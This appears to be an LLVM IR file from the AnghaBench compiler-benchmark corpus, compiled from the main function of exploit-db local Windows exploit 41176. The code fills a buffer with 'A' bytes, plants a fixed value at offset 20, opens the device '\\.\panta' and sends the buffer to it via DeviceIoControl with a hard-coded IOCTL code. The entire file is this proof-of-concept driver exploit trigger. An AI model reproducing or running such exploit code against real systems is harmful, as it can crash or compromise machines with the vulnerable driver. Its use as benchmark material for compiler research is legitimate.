; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_41176.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_41176.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@MAX_PATH = common dso_local global i32 0, align 4
@BUFSIZE = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [41 x i8] c"\0A[i] Size of total input buffer %d bytes\00", align 1
@.str.1 = private unnamed_addr constant [7 x i8] c"\\\\.\\%s\00", align 1
@.str.2 = private unnamed_addr constant [6 x i8] c"panta\00", align 1
@GENERIC_READ = common dso_local global i32 0, align 4
@GENERIC_WRITE = common dso_local global i32 0, align 4
@FILE_SHARE_READ = common dso_local global i32 0, align 4
@FILE_SHARE_WRITE = common dso_local global i32 0, align 4
@OPEN_EXISTING = common dso_local global i32 0, align 4
@INVALID_HANDLE_VALUE = common dso_local global i64 0, align 8
@.str.3 = private unnamed_addr constant [32 x i8] c"\0A[-] Failed to open device %s\0A\0A\00", align 1
@.str.4 = private unnamed_addr constant [31 x i8] c"\0A[+] Open %s device successful\00", align 1
@.str.5 = private unnamed_addr constant [37 x i8] c"\0A[~] Press any key to continue . . .\00", align 1
@.str.6 = private unnamed_addr constant [2 x i8] c"\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i64, align 8
  %7 = alloca i8*, align 8
  %8 = alloca i64, align 8
  %9 = alloca i32, align 4
  %10 = alloca i64, align 8
  %11 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %12 = load i32, i32* @MAX_PATH, align 4
  %13 = zext i32 %12 to i64
  %14 = call i8* @llvm.stacksave()
  store i8* %14, i8** %7, align 8
  %15 = alloca i8, i64 %13, align 16
  store i64 %13, i64* %8, align 8
  store i32 0, i32* %9, align 4
  %16 = load i32, i32* @BUFSIZE, align 4
  %17 = zext i32 %16 to i64
  %18 = alloca i8, i64 %17, align 16
  store i64 %17, i64* %10, align 8
  %19 = load i32, i32* @BUFSIZE, align 4
  %20 = call i32 @memset(i8* %18, i32 65, i32 %19)
  %21 = load i32, i32* @BUFSIZE, align 4
  %22 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([41 x i8], [41 x i8]* @.str, i64 0, i64 0), i32 %21)
  %23 = getelementptr inbounds i8, i8* %18, i64 20
  %24 = bitcast i8* %23 to i32*
  store i32 76695845, i32* %24, align 4
  %25 = call i32 @sprintf(i8* %15, i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.1, i64 0, i64 0), i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.2, i64 0, i64 0))
  %26 = load i32, i32* @GENERIC_READ, align 4
  %27 = load i32, i32* @GENERIC_WRITE, align 4
  %28 = or i32 %26, %27
  %29 = load i32, i32* @FILE_SHARE_READ, align 4
  %30 = load i32, i32* @FILE_SHARE_WRITE, align 4
  %31 = or i32 %29, %30
  %32 = load i32, i32* @OPEN_EXISTING, align 4
  %33 = call i64 @CreateFile(i8* %15, i32 %28, i32 %31, i32* null, i32 %32, i32 0, i32* null)
  store i64 %33, i64* %6, align 8
  %34 = load i64, i64* %6, align 8
  %35 = load i64, i64* @INVALID_HANDLE_VALUE, align 8
  %36 = icmp eq i64 %34, %35
  br i1 %36, label %37, label %39

37:                                               ; preds = %2
  %38 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([32 x i8], [32 x i8]* @.str.3, i64 0, i64 0), i8* %15)
  store i32 -1, i32* %3, align 4
  store i32 1, i32* %11, align 4
  br label %50

39:                                               ; preds = %2
  %40 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([31 x i8], [31 x i8]* @.str.4, i64 0, i64 0), i8* %15)
  br label %41

41:                                               ; preds = %39
  %42 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([37 x i8], [37 x i8]* @.str.5, i64 0, i64 0))
  %43 = call i32 (...) @getch()
  %44 = load i64, i64* %6, align 8
  %45 = load i32, i32* @BUFSIZE, align 4
  %46 = call i32 @DeviceIoControl(i64 %44, i32 -2013257216, i8* %18, i32 %45, i32* null, i32 0, i32* %9, i32* null)
  %47 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([2 x i8], [2 x i8]* @.str.6, i64 0, i64 0))
  %48 = load i64, i64* %6, align 8
  %49 = call i32 @CloseHandle(i64 %48)
  store i32 0, i32* %3, align 4
  store i32 1, i32* %11, align 4
  br label %50

50:                                               ; preds = %41, %37
  %51 = load i8*, i8** %7, align 8
  call void @llvm.stackrestore(i8* %51)
  %52 = load i32, i32* %3, align 4
  ret i32 %52
}

; Function Attrs: nounwind
declare i8* @llvm.stacksave() #1

declare dso_local i32 @memset(i8*, i32, i32) #2

declare dso_local i32 @printf(i8*, ...) #2

declare dso_local i32 @sprintf(i8*, i8*, i8*) #2

declare dso_local i64 @CreateFile(i8*, i32, i32, i32*, i32, i32, i32*) #2

declare dso_local i32 @getch(...) #2

declare dso_local i32 @DeviceIoControl(i64, i32, i8*, i32, i32*, i32, i32*, i32*) #2

declare dso_local i32 @CloseHandle(i64) #2

; Function Attrs: nounwind
declare void @llvm.stackrestore(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
